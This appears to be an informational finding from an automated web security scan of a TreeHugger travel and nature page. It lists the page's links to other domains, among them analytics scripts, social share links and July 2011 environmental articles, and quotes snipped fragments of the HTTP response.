<br><a href="http://planetgreen.discovery.com/">Planet Green</a> | <a href="http://www.howstuffworks.com/">HowStuffWorks</a> | <a href="http://times.discovery.com">Discovery Times</a> | <a href="http://kids.discovery.com">Discovery Kids</a> | <a href="http://dhd.discovery.com">HD Theater</a> | <a href="http://fittv.discovery.com">FitTV</a> | <a href="http://www.petfinder.com">Petfinder</a> | <a href="http://turbo.discovery.com">Turbo</a>
...[SNIP]...
</div>

<script src="http://content.dl-rms.com/rms/mother/21163/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/549.js"></script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<div class="facebook-widget">
<iframe scrolling="no" frameborder="0" src="http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0" allowtransparency="true" style="border: none; width: 200px; height: 260px; padding: 0px; margin: 0px; min-height: 260px;"></iframe>
...[SNIP]...
<li><a href="http://twitter.com/treehugger"><img src="/scripts/slideouttab/redo/twitter.png" />
...[SNIP]...
<li><a href="http://twitter.com/th_rss"><img src="/scripts/slideouttab/redo/th_rss.png" />
...[SNIP]...
<li><a href="http://feeds.feedburner.com/treehuggersite"><img src="/scripts/slideouttab/redo/rss.png" />
...[SNIP]...
<div id="su-button-fixed">
<a href="http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton2"><img src="/images/social-media/su-button-fixed.png" />
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

18.191. http://www.treehugger.com/travel_nature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/travel_nature/

Issue detail

The page was loaded from a URL containing a query string:

http://www.treehugger.com/travel_nature/?campaign=th_nav_travel

The response contains the following links to other domains:

http://alt-e.blogspot.com/
http://animal.discovery.com/
http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://corporate.discovery.com/
http://corporate.discovery.com/privacy-policy/
http://corporate.discovery.com/visitor-agreement/
http://creativecommons.org/licenses/by/2.0/
http://creativecommons.org/licenses/by/2.0/deed.en
http://dhd.discovery.com/
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)
http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://discctreehugger.112.2o7.net/b/ss/discctreehugger/1/H.20.3--NS/0
http://dsc.discovery.com/
http://earth.google.com/ocean/
http://ecoiron.blogspot.com/
http://edge.quantserve.com/quant.js
http://en.wikipedia.org/wiki/Atacama_Desert
http://en.wikipedia.org/wiki/Clover_(creature)
http://en.wikipedia.org/wiki/File:FatuIva_BasalticRocksAboveHanavave_20061111.jpg
http://en.wikipedia.org/wiki/Green_sea_turtle
http://en.wikipedia.org/wiki/Redwood_National_and_State_Parks
http://feedproxy.google.com/TreehuggerRadio
http://feeds.feedburner.com/treehugger/itunes
http://feeds.feedburner.com/treehuggersite
http://feeds.feedburner.com/~fc/treehuggersite?bg=00CC00&fg=444444&anim=1
http://fittv.discovery.com/
http://fogcity.blogs.com/jen/
http://google-latlong.blogspot.com/2011/06/see-seafloor-like-never-before-on-world.html
http://greatgreengoods.com/
http://greenerside.typepad.com/my_weblog/
http://greenrfidguy.com/
http://grubbook.blogspot.com/
http://health.discovery.com/
http://icompass.insightexpressai.com/549.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://kids.discovery.com/
http://nationalzoo.si.edu/scbi/aquaticecosystems/seaturtles/seaturtlesafricadeem.cfm
http://news.mongabay.com/2011/0720-hance_atacama.html
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger
http://planetgreen.discovery.com/
http://planetgreen.discovery.com/food-health/sun-screen.html
http://planetgreen.discovery.com/games-quizzes/?campaign=th_nav_quiz
http://planetgreen.discovery.com/games-quizzes/tom-green-quiz-game.html?campaign=th_nav_quiz
http://planetgreen.discovery.com/travel-outdoors/plastic-bags-hurt-dolphins.html
http://planetgreen.discovery.com/travel-outdoors/wolves-return-french-pyrenees.html
http://planetgreen.discovery.com/videos/treehugger-tv/
http://platform.twitter.com/widgets.js
http://player.vimeo.com/video/18305022?title=0&byline=0&portrait=0
http://science.discovery.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-204250h&cg=0&cc=1&ts=noscript
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy
http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy
http://store.discovery.com/?ecid=PRF-TV1-100552&pa=PRF-TV1-100552
http://store.discovery.com/detail.php?p=85651&ecid=PRF-TV1-100594&pa=PRF-TV1-100594
http://technorati.com/faves?add=http://www.treehugger.com
http://times.discovery.com/
http://tlc.discovery.com/
http://treehuggerz.blogspot.com/
http://turbo.discovery.com/
http://twitter.com/
http://twitter.com/th_rss
http://twitter.com/treehugger
http://unpluggedliving.com/
http://vimeo.com/18305022
http://watersana.typepad.com/watersana/
http://workerbees.typepad.com/hipandzen/
http://www.agroblogger.com/
http://www.clarklittlephotography.com/main/pages/bio
http://www.compost-bin.org/
http://www.dominomag.com/resources/2007/02/greenlist
http://www.ecofriend.org/
http://www.ecogeek.org/
http://www.evaneco.com/
http://www.facebook.com/connect/connect.php?id=17890180291&connections=6&stream=0
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&permalink=1
http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&t=Cool Off with Most Beautiful Waves Ever (Slideshow)
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&t=Driest Place On Earth Covered In 32 Of Snow (Photo)
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&t=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&t=Pollution in Paradise: Turkeys ..l..deniz At Risk
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&t=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&t=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&t=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)
http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&t=WhichFish.org Lists Fish that are Safe to Eat
http://www.fei.com/resources/image-gallery/hydro-worm-2908.aspx
http://www.fishonline.org/
http://www.flickr.com/people/terykats/
http://www.flickr.com/photos/dantaylor/4582310/in/photostream/
http://www.flickr.com/photos/furryscalyman/396164476/sizes/l/in/photostream/
http://www.flickr.com/photos/jaymiheimbuch/5623191996/sizes/m/in/photostream/
http://www.flickr.com/photos/jhattam/2630502200/in/photostream/
http://www.flickr.com/photos/joi/5594857346/sizes/m/in/photostream/
http://www.flickr.com/photos/mamoritai/3318308374/sizes/l/in/photostream/
http://www.flickr.com/photos/marijafilipovic/5861426335/in/set-72157627025584682/
http://www.flickr.com/photos/oxfameastafrica/5758400938/sizes/m/in/photostream/
http://www.flickr.com/photos/sameffron/5764944436/sizes/l/in/photostream/
http://www.flickr.com/photos/samfrasersmith/3795685459/in/photostream/
http://www.flickr.com/photos/tramod/5551690316/sizes/l/in/photostream/
http://www.flickr.com/photos/zigazou76/3588289579/
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
http://www.greenpeace.org/usa/en/campaigns/oceans/seafood/red-fish/
http://www.guardian.co.uk/environment/2011/jul/20/aftermath-yellowstone-river-oil-spill
http://www.howstuffworks.com/
http://www.ivanenviroman.com/
http://www.lefigaro.fr/environnement/2011/07/10/01029-20110710ARTFIG00210-retour-progressif-et-controle-du-loup-en-europe-de-l-ouest.php
http://www.mcsuk.org/
http://www.mitra.biz/blog/
http://www.montereybayaquarium.org/
http://www.montereybayaquarium.org/cr/SeafoodWatch/web/sfw_iPhone.aspx
http://www.nextbillion.net/
http://www.nigelsecostore.com/acatalog/spud-raincoat.html
http://www.nonscalable.com/
http://www.npr.org/blogs/pictureshow/2011/07/15/137821595/why-the-colorado-river-stopped-flowing?ft=1&f=1025
http://www.omniture.com/
http://www.pair.com/
http://www.petfinder.com/
http://www.projectgreenbag.com/
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)
http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&title=Driest Place On Earth Covered In 32 Of Snow (Photo)
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&title=TED Talk: Jonathan Drori on Tricks Flowers Play on Pollinators
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)
http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat
http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton1
http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton2
http://www.terrapass.com/terrablog/
http://www.triplepundit.com/
http://www.urbanecoinc.com/wordpress1/
http://www.visitbandung.net/a-day-trips/calling-out-all-surfer-dudes-roof-edge-awaits-in-ujung-genteng-indonesia.html
http://www.worldchanging.com/
http://www.worstedwitch.com/
http://www.youtube.com/embed/terD85scv4w
http://www.youtube.com/user/odziz
http://www.youtube.com/watch?v=terD85scv4w
http://www.zpluspartners.com/zblog/
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script><noscript><img src="http://pixel.quantserve.com/pixel/p-eeQ5-n64VG-GM.gif?labels=Treehugger" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://discctreehugger.112.2O7.net/b/ss/discctreehugger/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<script type="text/javascript" src="http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy"></script><noscript><a href="http://sm6.sitemeter.com/stats.asp?site=sm6damnhippy" target="_top"><img src="http://sm6.sitemeter.com/meter.asp?site=sm6damnhippy" alt="Site Meter" border="0"/></a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8"></script>
...[SNIP]...
<div style="float: right; position:relative; top: -2px; left: 0px;"><a href="http://www.stumbleupon.com/to/stumble/stumblethru:treehugger.com?utm_source=Treehugger&utm_medium=StumbleThru&utm_campaign=StumbleThruButton1"><img src="/images/stumble-treehugger.png" border="0" title="StumbleThru is a new way to discover the best TreeHugger content as determined by the StumbleUpon community. Click and see what you discover!
...[SNIP]...
<div style="float: right; position:relative; top: -2px; left: 0px; margin-right: 5px;">
<a href="http://twitter.com/treehugger" class="twitter-follow-button" data-button="grey" data-text-color="#FFFFFF" data-link-color="#74b31f" data-show-count="false" data-width="150px" data-align="right">Follow @treehugger</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a> | <a href="http://planetgreen.discovery.com/videos/treehugger-tv/">TV</a>
...[SNIP]...
</a> | <a href="http://store.discovery.com/detail.php?p=85651&ecid=PRF-TV1-100594&pa=PRF-TV1-100594">TreeHugger Book</a>
...[SNIP]...
<TD><a href="http://planetgreen.discovery.com/games-quizzes/tom-green-quiz-game.html?campaign=th_nav_quiz" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','http://www.treehugger.com/images_site/nav-images/nav-over_14.png',1)"><img src="http://www.treehugger.com/images_site/nav-images/nav_14.png" alt="Planet Green Games" name="Image14" width="163" height="15" border="0">
...[SNIP]...
<TD><a href="http://planetgreen.discovery.com/games-quizzes/?campaign=th_nav_quiz" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','http://www.treehugger.com/images_site/nav-images/nav-over_17.png',1)"><img src="http://www.treehugger.com/images_site/nav-images/nav_17.png" alt="Pop quizzes" name="Image17" width="163" height="19" border="0">
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<strong><a title="http://www.projectgreenbag.com" href="http://www.projectgreenbag.com" rel="nofollow">Manuel</a>
...[SNIP]...
<strong><a title="http://www.youtube.com/user/odziz" href="http://www.youtube.com/user/odziz" rel="nofollow">Barry</a>
...[SNIP]...
<strong><a title="http://www.nonscalable.com" href="http://www.nonscalable.com" rel="nofollow">Derek</a>
...[SNIP]...
</h3>
<a href="http://feedproxy.google.com/TreehuggerRadio" rel="nofollow"><img style="padding-left: 8px;" border="0" src="http://www.treehugger.com/images_site/rss-podcast.gif">
...[SNIP]...
</h3>
<a href="http://feeds.feedburner.com/treehugger/itunes" rel="nofollow"><img style="padding-left: 8px;" border="0" src="http://www.treehugger.com/images_site/video-podcast.gif">
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&t=Pollution in Paradise: Turkeys ..l..deniz At Risk" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&title=Pollution in Paradise: Turkeys ..l..deniz At Risk"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Aerial view of ..l..deniz, Turkey. Photo: <a href="http://www.flickr.com/photos/dantaylor/4582310/in/photostream/">Dan Taylor</a> / <a href="http://creativecommons.org/licenses/by/2.0/deed.en">Creative Commons</a>
...[SNIP]...
ea have come to a head recently, leading the Ministry of Environment and Urban Development to launch an investigation. Boat owners blamed for the problem have, however, pointed the finger at swimmers' <a href="http://planetgreen.discovery.com/food-health/sun-screen.html">sunscreens</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&t=WhichFish.org Lists Fish that are Safe to Eat" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<br />
There are many good ways to figure out which species of fish are under pressure - or even facing extinction - and which are 'ok' to eat. The most popular is probably the <a href="http://www.montereybayaquarium.org/">Monterey Bay Aquarium</a>'s <a href="http://www.montereybayaquarium.org/cr/SeafoodWatch/web/sfw_iPhone.aspx">Seafood Watch app for iPhone and Android</a>. The <a href="http://www.mcsuk.org/">Marine Conservation Society</a> also has a site called <a href="http://www.fishonline.org/">FishOnline</a>, as does <a href="http://www.greenpeace.org/usa/en/campaigns/oceans/seafood/red-fish/">Greenpeace</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&t=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&title=Silverback Gorilla Takes Close-Up Video of Himself With Toy Camera (Video)"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&t=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&title=Illegal Boat Caught with 357 Dead Sharks Off Galapagos Islands"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Photo by <a href="http://www.flickr.com/photos/joi/5594857346/sizes/m/in/photostream/">Joi </a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&t=Cool Off with Most Beautiful Waves Ever (Slideshow)" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&title=Cool Off with Most Beautiful Waves Ever (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<p><a href="http://www.clarklittlephotography.com/main/pages/bio">Clark Little</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&title=The Week in Animal News: Terrifying Toothy Sea Worms, Saving Sea Turtles, and More (Slideshow)"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
